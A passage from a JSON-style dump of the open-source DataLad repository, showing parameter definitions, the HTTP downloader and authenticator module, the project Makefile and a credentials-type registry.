EnsureNone())\n\nannex_group_opt = Parameter(\n args=(\"--annex-group\",),\n metavar='EXPR',\n doc=\"\"\"expression to specify a group for the repository.\n See https://git-annex.branchable.com/git-annex-group/ for more\n information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\nannex_groupwanted_opt = Parameter(\n args=(\"--annex-groupwanted\",),\n metavar='EXPR',\n doc=\"\"\"expression for the groupwanted.\n Makes sense only if [PY: annex_wanted PY][CMD: --annex-wanted CMD]=\"groupwanted\"\n and annex-group is given too.\n See https://git-annex.branchable.com/git-annex-groupwanted/ for more information\"\"\",\n constraints=EnsureStr() | EnsureNone())\n\n\ninherit_opt = Parameter(\n args=(\"--inherit\",),\n action=\"store_true\",\n doc=\"\"\"if sibling is missing, inherit settings (git config, git annex\n wanted/group/groupwanted) from its super-dataset\"\"\")\n\nmissing_sibling_opt = Parameter(\n args=(\"--missing\",),\n constraints=EnsureChoice('fail', 'inherit', 'skip'), # may be inherit-skip\n metavar='MODE',\n doc=\"\"\"action to perform, if a sibling does not exist in a given dataset.\n By default it would fail the run ('fail' setting). With 'inherit' a\n 'create-sibling' with '--inherit-settings' will be used to create sibling\n on the remote. With 'skip' - it simply will be skipped.\"\"\")\n\nwith_plugin_opt = Parameter(\n args=('--with-plugin',),\n nargs='*',\n action='append',\n metavar='PLUGINSPEC',\n doc=\"\"\"DataLad plugin to run in addition. PLUGINSPEC is a list\n comprised of a plugin name plus optional `key=value` pairs with arguments\n for the plugin call (see `plugin` command documentation for details).\n [PY: PLUGINSPECs must be wrapped in list where each item configures\n one plugin call. Plugins are called in the order defined by this list.\n PY][CMD: This option can be given more than once to run multiple plugins\n in the order in which they are given. CMD]\"\"\")\n\n# define parameters to be used by eval_results to tune behavior\n# Note: This is done outside eval_results in order to be available when building\n# docstrings for the decorated functions\n# TODO: May be we want to move them to be part of the classes _params. Depends\n# on when and how eval_results actually has to determine the class.\n# Alternatively build a callable class with these to even have a fake signature\n# that matches the parameters, so they can be evaluated and defined the exact\n# same way.\n\neval_params = dict(\n return_type=Parameter(\n doc=\"\"\"return value behavior switch. If 'item-or-list' a single\n value is returned instead of a one-item return value list, or a\n list in case of multiple return values. `None` is return in case\n of an empty list.\"\"\",\n default='list',\n constraints=EnsureChoice('generator', 'list', 'item-or-list')),\n result_filter=Parameter(\n doc=\"\"\"if given, each to-be-returned\n status dictionary is passed to this callable, and is only\n returned if the callable's return value does not\n evaluate to False or a ValueError exception is raised. If the given\n callable supports `**kwargs` it will additionally be passed the\n keyword arguments of the original API call.\"\"\",\n constraints=EnsureCallable() | EnsureNone()),\n result_xfm=Parameter(\n doc=\"\"\"if given, each to-be-returned result\n status dictionary is passed to this callable, and its return value\n becomes the result instead. This is different from\n `result_filter`, as it can perform arbitrary transformation of the\n result value. This is mostly useful for top-level command invocations\n that need to provide the results in a particular format. Instead of\n a callable, a label for a pre-crafted result transformation can be\n given.\"\"\",\n constraints=EnsureChoice(*list(known_result_xfms.keys())) | EnsureCallable() | EnsureNone()),\n result_renderer=Parameter(\n doc=\"\"\"select rendering mode command results.\n 'tailored' enables a command-specific rendering style that is typically\n tailored to human consumption, if there is one for a specific\n command, or otherwise falls back on the the 'generic' result renderer;\n 'generic' renders each result in one line with key info like action,\n status, path, and an optional message);\n 'json' a complete JSON line serialization of the full result record;\n 'json_pp' like 'json', but pretty-printed spanning multiple lines;\n 'disabled' turns off result rendering entirely;\n '<template>' reports any value(s) of any result properties in any\n format indicated by the template (e.g. '{path}', compare with JSON\n output for all key-value choices). The template syntax follows the\n Python \"format() language\". It is possible to report individual\n dictionary values, e.g. '{metadata[name]}'. If a 2nd-level key contains\n a colon, e.g. 'music:Genre', ':' must be substituted by '#' in the\n template, like so: '{metadata[music#Genre]}'.\"\"\",\n default='tailored'),\n on_failure=Parameter(\n doc=\"\"\"behavior to perform on failure: 'ignore' any failure is reported,\n but does not cause an exception; 'continue' if any failure occurs an\n exception will be raised at the end, but processing other actions will\n continue for as long as possible; 'stop': processing will stop on first\n failure and an exception is raised. A failure is any result with status\n 'impossible' or 'error'. Raised exception is an IncompleteResultsError\n that carries the result dictionaries of the failures in its `failed`\n attribute.\"\"\",\n default='continue',\n constraints=EnsureChoice('ignore', 'continue', 'stop')),\n)\n\neval_defaults = {\n k: p.cmd_kwargs.get('default', None)\n for k, p in eval_params.items()\n}\n\"\"\"\\\n.. deprecated:: 0.16\n This variable will be removed in a future release. The default values for\n all Parameters (possibly overriding by command-specific settings) are now\n available as :class:`Interface` attributes.\n\"\"\"\n" }, { "alpha_fraction": 0.6001362204551697, "alphanum_fraction": 0.6055838465690613, "avg_line_length": 40.15339279174805, "blob_id": "c6b791d89b144eb2c87ad75e06fc5e612a953362", "content_id": "bac25f00337e5964f5588ba5142fe361507b8a4b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27902, "license_type": "permissive", "max_line_length": 121, "num_lines": 678, "path": "/datalad/downloaders/http.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provide access to stuff (html, data files) via HTTP and HTTPS\n\n\"\"\"\nimport re\nimport requests\nimport requests.auth\nfrom requests.utils import parse_dict_header\n\n# at some point was trying to be too specific about which exceptions to\n# catch for a retry of a download.\n# from urllib3.exceptions import MaxRetryError, NewConnectionError\n\nimport io\nfrom time import sleep\n\nfrom .. import __version__\nfrom ..utils import (\n ensure_list_from_str,\n ensure_dict_from_str,\n ensure_bytes,\n)\nfrom ..dochelpers import borrowkwargs\n\nfrom ..ui import ui\nfrom ..utils import auto_repr\nfrom ..support.network import get_url_filename\nfrom ..support.network import get_response_disposition_filename\nfrom ..support.network import rfc2822_to_epoch\nfrom ..support.cookies import cookies_db\nfrom ..support.status import FileStatus\nfrom ..support.exceptions import (\n AccessDeniedError,\n AccessFailedError,\n CapturedException,\n DownloadError,\n UnhandledRedirectError,\n)\n\nfrom .base import Authenticator\nfrom .base import BaseDownloader, DownloaderSession\n\nfrom logging import getLogger\nfrom ..log import LoggerHelper\nlgr = getLogger('datalad.http')\n\n# Following https://meta.wikimedia.org/wiki/User-Agent_policy to provide\n# extended and informative User-Agent string\nDEFAULT_USER_AGENT = \\\n f'DataLad/{__version__} ' \\\n '(https://datalad.org; [email protected]) ' \\\n f'python-requests/{requests.__version__}'\n\ntry:\n import requests_ftp\n _FTP_SUPPORT = True\n requests_ftp.monkeypatch_session()\nexcept ImportError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to import requests_ftp, thus no ftp support: %s\", ce)\n _FTP_SUPPORT = False\n\nif lgr.getEffectiveLevel() <= 1:\n # Let's also enable requests etc debugging\n\n # These two lines enable debugging at httplib level (requests->urllib3->http.client)\n # You will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.\n # The only thing missing will be the response.body which is not logged.\n import http.client\n # TODO: nohow wrapped with logging, plain prints (heh heh), so formatting will not be consistent\n http.client.HTTPConnection.debuglevel = 1\n\n # for requests we can define logging properly\n requests_log = LoggerHelper(logtarget=\"requests.packages.urllib3\").get_initialized_logger()\n requests_log.setLevel(lgr.getEffectiveLevel())\n requests_log.propagate = True\n\n__docformat__ = 'restructuredtext'\n\n\ndef process_www_authenticate(v):\n if not v:\n return []\n # TODO: provide proper parsing/handling of this custom format and wider support:\n # <type> realm=<realm>[, charset=\"UTF-8\"]\n # More notes: https://github.com/datalad/datalad/issues/5846#issuecomment-890221053\n # The most complete solution is from 2018 on https://stackoverflow.com/a/52462292/1265472\n # relying on parsing it using pyparsing.\n supported_type = v.split(' ')[0].lower()\n our_type = {\n 'basic': 'http_basic_auth',\n 'digest': 'http_digest_auth',\n # TODO: bearer_token_anon ?\n }.get(supported_type)\n return [our_type] if our_type else []\n\n\ndef check_response_status(response, err_prefix=\"\", session=None):\n \"\"\"Check if response's status_code signals problem with authentication etc\n\n ATM succeeds only if response code was 200\n \"\"\"\n if not err_prefix:\n err_prefix = \"Access to %s has failed: \" % response.url\n # 401 would be for digest authentication mechanism, or if we first ask which mechanisms are\n # supported.... must be linked into the logic if we decide to automagically detect which\n # mechanism or to give more sensible error message\n err_msg = err_prefix + \"status code %d\" % response.status_code\n if response.status_code in {404}:\n # It could have been that form_url is wrong, so let's just say that\n # TODO: actually may be that is where we could use tagid and actually determine the form submission url\n raise DownloadError(err_prefix + \"not found\")\n elif 400 <= response.status_code < 500:\n raise AccessDeniedError(\n err_msg,\n supported_types=process_www_authenticate(\n response.headers.get('WWW-Authenticate')),\n status=response.status_code)\n elif response.status_code in {200}:\n pass\n elif response.status_code in {301, 302, 307}:\n # TODO: apparently tests do not exercise this one yet\n if session is None:\n raise AccessFailedError(err_msg + \" no session was provided\",\n status=response.status_code)\n redirs = list(session.resolve_redirects(response, response.request))\n if len(redirs) > 1:\n lgr.warning(\"Multiple redirects aren't supported yet. Taking first\")\n elif len(redirs) == 0:\n raise AccessFailedError(\"No redirects were resolved\",\n status=response.status_code)\n raise UnhandledRedirectError(err_msg, url=redirs[0].url,\n status=response.status_code)\n else:\n raise AccessFailedError(err_msg, status=response.status_code)\n\n\n@auto_repr\nclass HTTPBaseAuthenticator(Authenticator):\n \"\"\"Base class for html_form and http_auth authenticators\n \"\"\"\n def __init__(self, url=None, failure_re=None, success_re=None,\n session_cookies=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n url : str, optional\n URL where to find the form/login to authenticate. If not provided, an original query url\n which will be provided to the __call__ of the authenticator will be used\n failure_re : str or list of str, optional\n success_re : str or list of str, optional\n Regular expressions to determine if login has failed or succeeded.\n TODO: we might condition when it gets ran\n session_cookies : str or list of str, optional\n Session cookies to store (besides auth response cookies)\n \"\"\"\n super(HTTPBaseAuthenticator, self).__init__(**kwargs)\n self.url = url\n self.failure_re = ensure_list_from_str(failure_re)\n self.success_re = ensure_list_from_str(success_re)\n self.session_cookies = ensure_list_from_str(session_cookies)\n\n def authenticate(self, url, credential, session, update=False):\n # we should use specified URL for this authentication first\n lgr.info(\"http session: Authenticating into session for %s\", url)\n post_url = self.url if self.url else url\n credential.set_context(auth_url=post_url)\n credentials = credential()\n\n # The whole thing relies on server first spitting out 401\n # and client getting again with 'Authentication:' header\n # So we need custom handling for those, while keeping track not\n # of cookies per se, but of 'Authentication:' header which is\n # to be used in subsequent GETs\n response = self._post_credential(credentials, post_url, session)\n if response is None:\n # authentication did not involve any interaction, nothing to\n # check at this point\n return\n\n # Handle responses if there was initial authentication exchange,\n # e.g. posting to a form and getting a cookie etc\n err_prefix = \"Authentication to %s failed: \" % post_url\n try:\n check_response_status(response, err_prefix, session=session)\n except DownloadError:\n # It might have happened that the return code was 'incorrect'\n # and we did get some feedback, which we could analyze to\n # figure out actual problem. E.g. in case of nersc of crcns\n # it returns 404 (not found) with text in the html\n if response is not None and response.text:\n self.check_for_auth_failure(response.text, err_prefix)\n raise\n\n response_text = response.text\n self.check_for_auth_failure(response_text, err_prefix)\n\n if self.success_re:\n # the one which must be used to verify success\n # verify that we actually logged in\n for success_re in self.success_re:\n if not re.search(success_re, response_text):\n raise AccessDeniedError(\n err_prefix + \" returned output did not match 'success' regular expression %s\" % success_re\n )\n\n cookies_dict = {}\n if response.cookies:\n cookies_dict = requests.utils.dict_from_cookiejar(response.cookies)\n if self.session_cookies:\n # any session cookies to store\n cookies_dict.update({k: session.cookies[k] for k in self.session_cookies})\n\n if cookies_dict:\n if (url in cookies_db) and update:\n cookies_db[url].update(cookies_dict)\n else:\n cookies_db[url] = cookies_dict\n # assign cookies for this session\n for c, v in cookies_dict.items():\n if c not in session.cookies or session.cookies[c] != v:\n session.cookies[c] = v # .update(cookies_dict)\n\n return response\n\n def _post_credential(self, credentials, post_url, session):\n raise NotImplementedError(\"Must be implemented in subclass\")\n\n def check_for_auth_failure(self, content, err_prefix=\"\"):\n if self.failure_re:\n content_is_bytes = isinstance(content, bytes)\n # verify that we actually logged in\n for failure_re in self.failure_re:\n if content_is_bytes:\n # content could be not in utf-8. But I do not think that\n # it is worth ATM messing around with guessing encoding\n # of the content to figure out what to encode it into\n # since typically returned \"auth failed\" should be in\n # utf-8 or plain ascii\n failure_re = ensure_bytes(failure_re)\n if re.search(failure_re, content):\n raise AccessDeniedError(\n err_prefix + \"returned output which matches regular expression %s\" % failure_re\n )\n\n\n@auto_repr\nclass HTMLFormAuthenticator(HTTPBaseAuthenticator):\n \"\"\"Authenticate by opening a session via POSTing to HTML form\n \"\"\"\n\n def __init__(self, fields, tagid=None, **kwargs):\n \"\"\"\n\n Example specification in the .ini config file\n [provider:crcns]\n ...\n credential = crcns ; is not given to authenticator as is\n authentication_type = html_form\n # TODO: may be rename into post_url\n html_form_url = https://crcns.org/login_form\n # probably not needed actually since form_url\n # html_form_tagid = login_form\n html_form_fields = __ac_name={user}\n __ac_password={password}\n submit=Log in\n form.submitted=1\n js_enabled=0\n cookies_enabled=\n html_form_failure_re = (Login failed|Please log in)\n html_form_success_re = You are now logged in\n\n Parameters\n ----------\n fields : str or dict\n String or a dictionary, which will be used (along with credential) information\n to feed into the form\n tagid : str, optional\n id of the HTML <form> in the document to use. If None, and page contains a single form,\n that one will be used. If multiple forms -- error will be raise\n **kwargs : dict, optional\n Passed to super class HTTPBaseAuthenticator\n \"\"\"\n super(HTMLFormAuthenticator, self).__init__(**kwargs)\n self.fields = ensure_dict_from_str(fields)\n self.tagid = tagid\n\n def _post_credential(self, credentials, post_url, session):\n post_fields = {\n k: v.format(**credentials)\n for k, v in self.fields.items()\n }\n\n response = session.post(post_url, data=post_fields)\n lgr.debug(\"Posted to %s fields %s, got response %s with headers %s\",\n post_url, list(post_fields.keys()), response,\n list(response.headers.keys()))\n return response\n\n\n@auto_repr\nclass HTTPRequestsAuthenticator(HTTPBaseAuthenticator):\n \"\"\"Base class for various authenticators using requests pre-crafted ones\n\n\n Note, that current implementation assumes REQUESTS_FIELDS to be identical to\n the keys of a `Credential` object's FIELDS.\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = None\n REQUESTS_FIELDS = ('user', 'password')\n\n def __init__(self, **kwargs):\n # so we have __init__ solely for a custom docstring\n super(HTTPRequestsAuthenticator, self).__init__(**kwargs)\n\n def _post_credential(self, credentials, post_url, session):\n authenticator = self.REQUESTS_AUTHENTICATOR(\n *[credentials[f] for f in self.REQUESTS_FIELDS])\n session.auth = authenticator\n\n\n@auto_repr\nclass HTTPBasicAuthAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via basic HTTP authentication\n\n Example specification in the .ini config file\n [provider:hcp-db]\n ...\n credential = hcp-db\n authentication_type = http_auth\n\n Parameters\n ----------\n **kwargs : dict, optional\n Passed to super class HTTPBaseAuthenticator\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = requests.auth.HTTPBasicAuth\n\n\n@auto_repr\nclass HTTPAuthAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via Basic authentication to some other post url\n\n TODO: actually this is some remnants which might later were RFed\n into the form authenticator since otherwise they make little sense\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = requests.auth.HTTPBasicAuth\n\n def _post_credential(self, credentials, post_url, session):\n authenticator = self.REQUESTS_AUTHENTICATOR(\n *[credentials[f] for f in self.REQUESTS_FIELDS])\n session.auth = authenticator\n response = session.post(post_url, data={},\n auth=authenticator)\n auth_request = response.headers.get('www-authenticate')\n if response.status_code == 401 and auth_request:\n if auth_request.lower().split(' ', 1)[0] == 'basic':\n if response.url != post_url:\n # was instructed to authenticate elsewhere\n # TODO: do we need to loop may be??\n response2 = session.get(response.url, auth=authenticator)\n return response2\n else:\n lgr.warning(\n f\"{self} received response with www-authenticate={auth_request!r} \"\n \"which is not Basic, and thus it cannot handle ATM.\")\n return response\n\n\n@auto_repr\nclass HTTPDigestAuthAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via HTTP digest authentication\n \"\"\"\n\n REQUESTS_AUTHENTICATOR = requests.auth.HTTPDigestAuth\n\n\n@auto_repr\nclass HTTPBearerTokenAuthenticator(HTTPRequestsAuthenticator):\n \"\"\"Authenticate via HTTP Authorization header\n \"\"\"\n\n DEFAULT_CREDENTIAL_TYPE = 'token'\n\n def __init__(self, **kwargs):\n # so we have __init__ solely for a custom docstring\n super(HTTPBearerTokenAuthenticator, self).__init__(**kwargs)\n\n def _post_credential(self, credentials, post_url, session):\n # we do not need to post anything, just inject token into the session\n session.headers['Authorization'] = \"Bearer %s\" % credentials['token']\n\n\n@auto_repr\nclass HTTPAnonBearerTokenAuthenticator(HTTPBearerTokenAuthenticator):\n \"\"\"Retrieve token via 401 response and add Authorization: Bearer header.\n \"\"\"\n\n allows_anonymous = True\n\n def authenticate(self, url, credential, session, update=False):\n if credential:\n lgr.warning(\n \"Argument 'credential' specified, but it will be ignored: %s\",\n credential)\n response = session.head(url)\n status = response.status_code\n if status == 200:\n lgr.debug(\"No authorization needed for %s\", url)\n return\n if status != 401:\n raise DownloadError(\n \"Expected 200 or 401 but got {} from {}\"\n .format(status, url))\n\n lgr.debug(\"Requesting authorization token for %s\", url)\n # TODO: it is not RFC 2068 Section 2 format, but a custom\n # <type> realm=<realm>[, charset=\"UTF-8\"]\n # see TODO/harmonize with process_www_authenticate\n auth_parts = parse_dict_header(response.headers[\"www-authenticate\"])\n auth_url = (\"{}?service={}&scope={}\"\n .format(auth_parts[\"Bearer realm\"],\n auth_parts[\"service\"],\n auth_parts[\"scope\"]))\n auth_response = session.get(auth_url)\n try:\n auth_info = auth_response.json()\n except ValueError as e:\n raise DownloadError(\n \"Failed to get information from {}\"\n .format(auth_url)) from e\n session.headers['Authorization'] = \"Bearer \" + auth_info[\"token\"]\n\n\n@auto_repr\nclass HTTPDownloaderSession(DownloaderSession):\n def __init__(self, size=None, filename=None, url=None, headers=None,\n response=None, chunk_size=1024 ** 2):\n super(HTTPDownloaderSession, self).__init__(\n size=size, filename=filename, url=url, headers=headers,\n )\n self.chunk_size = chunk_size\n self.response = response\n\n def download(self, f=None, pbar=None, size=None):\n response = self.response\n # content_gzipped = 'gzip' in response.headers.get('content-encoding', '').split(',')\n # if content_gzipped:\n # raise NotImplemented(\"We do not support (yet) gzipped content\")\n # # see https://rationalpie.wordpress.com/2010/06/02/python-streaming-gzip-decompression/\n # # for ways to implement in python 2 and 3.2's gzip is working better with streams\n\n total = 0\n return_content = f is None\n if f is None:\n # no file to download to\n # TODO: actually strange since it should have been decoded then...\n f = io.BytesIO()\n\n # must use .raw to be able avoiding decoding/decompression while downloading\n # to a file\n chunk_size_ = min(self.chunk_size, size) if size is not None else self.chunk_size\n\n # XXX With requests_ftp BytesIO is provided as response.raw for ftp urls,\n # which has no .stream, so let's do ducktyping and provide our custom stream\n # via BufferedReader for such cases, while maintaining the rest of code\n # intact. TODO: figure it all out, since doesn't scale for any sizeable download\n # This code is tested by tests/test_http.py:test_download_ftp BUT\n # it causes 503 on travis, but not always so we allow to skip that test\n # in such cases. That causes fluctuating coverage\n if not hasattr(response.raw, 'stream'): # pragma: no cover\n def _stream():\n buf = io.BufferedReader(response.raw)\n v = True\n while v:\n v = buf.read(chunk_size_)\n yield v\n\n stream = _stream()\n else:\n # XXX TODO -- it must be just a dirty workaround\n # As we discovered with downloads from NITRC all headers come with\n # Content-Encoding: gzip which leads requests to decode them. But the point\n # is that ftp links (yoh doesn't think) are gzip compressed for the transfer\n decode_content = not response.url.startswith('ftp://')\n stream = response.raw.stream(chunk_size_, decode_content=decode_content)\n\n for chunk in stream:\n if chunk: # filter out keep-alive new chunks\n chunk_len = len(chunk)\n if size is not None and total + chunk_len > size:\n # trim the download to match target size\n chunk = chunk[:size - total]\n chunk_len = len(chunk)\n total += chunk_len\n f.write(chunk)\n try:\n # TODO: pbar is not robust ATM against > 100% performance ;)\n if pbar:\n pbar.update(total)\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\"Failed to update progressbar: %s\", ce)\n # TEMP\n # see https://github.com/niltonvolpato/python-progressbar/pull/44\n ui.out.flush()\n if size is not None and total >= size: # pragma: no cover\n break # we have done as much as we were asked\n\n if return_content:\n out = f.getvalue()\n return out\n\n\n@auto_repr\nclass HTTPDownloader(BaseDownloader):\n \"\"\"A stateful downloader to maintain a session to the website\n \"\"\"\n\n @borrowkwargs(BaseDownloader)\n def __init__(self, headers=None, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n headers: dict, optional\n Header fields to be provided to the session. Unless User-Agent provided, a custom\n one, available in `DEFAULT_USER_AGENT` constant of this module will be used.\n \"\"\"\n super(HTTPDownloader, self).__init__(**kwargs)\n self._session = None\n headers = headers.copy() if headers else {}\n if 'user-agent' not in map(str.lower, headers):\n headers['User-Agent'] = DEFAULT_USER_AGENT\n self._headers = headers\n\n def _establish_session(self, url, allow_old=True):\n \"\"\"\n\n Parameters\n ----------\n allow_old: bool, optional\n If a Downloader allows for persistent sessions by some means -- flag\n instructs whether to use previous session, or establish a new one\n\n Returns\n -------\n bool\n To state if old instance of a session/authentication was used\n \"\"\"\n if allow_old:\n if self._session:\n lgr.debug(\"http session: Reusing previous\")\n return True # we used old\n elif url in cookies_db:\n cookie_dict = cookies_db[url]\n lgr.debug(\"http session: Creating new with old cookies %s\", list(cookie_dict.keys()))\n self._session = requests.Session()\n # not sure what happens if cookie is expired (need check to that or exception will prolly get thrown)\n\n # TODO dict_to_cookiejar doesn't preserve all fields when reversed\n self._session.cookies = requests.utils.cookiejar_from_dict(cookie_dict)\n # TODO cookie could be expired w/ something like (but docs say it should be expired automatically):\n # http://docs.python-requests.org/en/latest/api/#requests.cookies.RequestsCookieJar.clear_expired_cookies\n # self._session.cookies.clear_expired_cookies()\n return True\n\n lgr.debug(\"http session: Creating brand new session\")\n self._session = requests.Session()\n self._session.headers.update(self._headers)\n if self.authenticator:\n self.authenticator.authenticate(url, self.credential, self._session)\n\n return False\n\n def get_downloader_session(self, url,\n allow_redirects=True,\n use_redirected_url=True,\n headers=None):\n # TODO: possibly make chunk size adaptive\n # TODO: make it not this ugly -- but at the moment we are testing end-file size\n # while can't know for sure if content was gunziped and whether it all went ok.\n # So safer option -- just request to not have it gzipped\n if headers is None:\n headers = {}\n if 'Accept-Encoding' not in headers:\n headers['Accept-Encoding'] = ''\n\n # TODO: our tests ATM aren't ready for retries, thus altogether disabled for now\n nretries = 1\n for retry in range(1, nretries+1):\n try:\n response = self._session.get(\n url, stream=True, allow_redirects=allow_redirects,\n headers=headers)\n #except (MaxRetryError, NewConnectionError) as exc:\n except Exception as exc:\n ce = CapturedException(exc)\n # happen to run into those with urls pointing to Amazon,\n # so let's rest and try again\n if retry >= nretries:\n #import epdb; epdb.serve()\n if not _FTP_SUPPORT and url.startswith(\"ftp://\"):\n msg_ftp = \"For ftp:// support, install requests_ftp. \"\n else:\n msg_ftp = \"\"\n\n raise AccessFailedError(\n \"Failed to establish a new session %d times. %s\"\n % (nretries, msg_ftp)) from exc\n lgr.warning(\n \"Caught exception %s. Will retry %d out of %d times\",\n ce, retry + 1, nretries)\n sleep(2**retry)\n\n check_response_status(response, session=self._session)\n headers = response.headers\n lgr.debug(\"Establishing session for url %s, response headers: %s\",\n url, headers)\n target_size = int(headers.get('Content-Length', '0').strip()) or None\n if use_redirected_url and response.url and response.url != url:\n lgr.debug(\"URL %s was redirected to %s and thus the later will be used\"\n % (url, response.url))\n url = response.url\n # Consult about filename. Since we already have headers,\n # should not result in an additional request\n url_filename = get_url_filename(url, headers=headers)\n\n headers['Url-Filename'] = url_filename\n return HTTPDownloaderSession(\n size=target_size,\n url=response.url,\n filename=url_filename,\n headers=headers,\n response=response\n )\n\n @classmethod\n def get_status_from_headers(cls, headers):\n \"\"\"Given HTTP headers, return 'status' record to assess later if link content was changed\n \"\"\"\n # used for quick checks for HTTP or S3?\n # TODO: So we will base all statuses on this set? e.g. for Last-Modified if to be\n # mapping from field to its type converter\n HTTP_HEADERS_TO_STATUS = {\n 'Content-Length': int,\n 'Content-Disposition': str,\n 'Last-Modified': rfc2822_to_epoch,\n 'Url-Filename': str,\n }\n # Allow for webserver to return them in other casing\n HTTP_HEADERS_TO_STATUS_lower = {s.lower(): (s, t) for s, t in HTTP_HEADERS_TO_STATUS.items()}\n status = {}\n if headers:\n for header_key in headers:\n try:\n k, t = HTTP_HEADERS_TO_STATUS_lower[header_key.lower()]\n except KeyError:\n continue\n status[k] = t(headers[header_key])\n\n # convert to FileStatus\n return FileStatus(\n size=status.get('Content-Length'),\n mtime=status.get('Last-Modified'),\n filename=get_response_disposition_filename(\n status.get('Content-Disposition')) or status.get('Url-Filename')\n )\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6804938316345215, "avg_line_length": 32.196720123291016, "blob_id": "06ac6847bbf45fb6a9bc68a1efe0aeebdec0df8d", "content_id": "a10e9e5483345bda53cf64f5cfe09b3d4177009a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2025, "license_type": "permissive", "max_line_length": 150, "num_lines": 61, "path": "/Makefile", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# simple makefile to simplify repetitive build env management tasks under posix\n# Ideas borrowed from scikit-learn's and PyMVPA Makefiles -- thanks!\n\nPYTHON ?= python\n\nMODULE ?= datalad\n\nall: clean test\n\nclean:\n\t$(PYTHON) setup.py clean\n\trm -rf dist build bin\n\t-find . -name '*.pyc' -delete\n\t-find . -name '__pycache__' -type d -delete\n\nbin:\n\tmkdir -p $@\n\tPYTHONPATH=\"bin:$(PYTHONPATH)\" $(PYTHON) setup.py develop --install-dir $@\n\ntrailing-spaces:\n\tfind $(MODULE) -name \"*.py\" -exec perl -pi -e 's/[ \\t]*$$//' {} \\;\n\ncode-analysis:\n\tflake8 $(MODULE) | grep -v __init__ | grep -v external\n\tpylint -E -i y $(MODULE)/ # -d E1103,E0611,E1101\n\nlinkissues-changelog:\n\ttools/link_issues_CHANGELOG\n\nupdate-changelog: CHANGELOG.md\n\t@echo \".. This file is auto-converted from CHANGELOG.md (make update-changelog) -- do not edit\\n\\nChange log\\n**********\" > docs/source/changelog.rst\n\t# sphinx 3.4.3-2 on Debian incorrectly handles unicode character\n\t# and then fails claiming that underlines are too short. So we remove all\n\t# such problematic ones for now.\n\t# Also, for some reason auto sticks subsections all the way to 4th level of sectioning,\n\t# so we bring them back to 2nd.\n\t# And pandoc manages to just skip all the valid markdown urls for authors within (),\n\t# so doing manual post conversion\n\tcat \"$<\" | sed -e 's,^#### ,## ,g' \\\n\t| iconv -c -f utf-8 -t ascii \\\n | grep -v '^<.*> *$$' \\\n\t| pandoc -t rst \\\n\t| sed -e 's,\\[\\(@[^]]*\\)\\](\\([^)]*\\)),\\`\\1 <\\2>\\`__,g' \\\n\t>> docs/source/changelog.rst\n\n\nrelease-pypi: update-changelog\n\t# avoid upload of stale builds\n\ttest ! -e dist\n\t$(PYTHON) setup.py sdist\n\t# the wheels we would produce are broken on windows, because they\n\t# install an incompatible entrypoint script\n\t# https://github.com/datalad/datalad/issues/4315\n\t#$(PYTHON) setup.py bdist_wheel\n\ttwine upload dist/*\n\ndocs/source/basics_cmdline.rst.in: build/casts/cmdline_basic_usage.json\n\ttools/cast2rst $^ > $@\n\ndocs/source/basics_nesteddatasets.rst.in: build/casts/seamless_nested_repos.json\n\ttools/cast2rst $^ > $@\n" }, { "alpha_fraction": 0.5681818127632141, "alphanum_fraction": 0.5785984992980957, "avg_line_length": 28.33333396911621, "blob_id": "c4eac8787d1519ef5c00fc4340bca168489a8cec", "content_id": "a350edecbeeedbc6480d6c31c411444d43c7f76c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1056, "license_type": "permissive", "max_line_length": 87, "num_lines": 36, "path": "/datalad/downloaders/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Sub-module to provide access (as to download/query etc) to the remote sites\n\n\"\"\"\n\nfrom datalad.downloaders.credentials import (\n AWS_S3,\n LORIS_Token,\n NDA_S3,\n Token,\n UserPassword,\n GitCredential)\n\n__docformat__ = 'restructuredtext'\n\nfrom logging import getLogger\nlgr = getLogger('datalad.providers')\n\n# TODO: we might not need to instantiate it right here\n# lgr.debug(\"Initializing data providers credentials interface\")\n# providers = Providers().from_config_files()\nCREDENTIAL_TYPES = {\n 'user_password': UserPassword,\n 'aws-s3': AWS_S3,\n 'nda-s3': NDA_S3,\n 'token': Token,\n 'loris-token': LORIS_Token,\n 'git': GitCredential,\n}\n" }, { "alpha_fraction": 0.6050763726234436, "alphanum_fraction": 0.6107637882232666, "avg_line_length": 34.281925201416016, "blob_id": "f5a8b5a824b7f0c0128741bea40e828f512c04a7", "content_id": "fec54b84f927fa686d15fc8199a38a46432d29ee", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21275, "license_type": "permissive", "max_line_length": 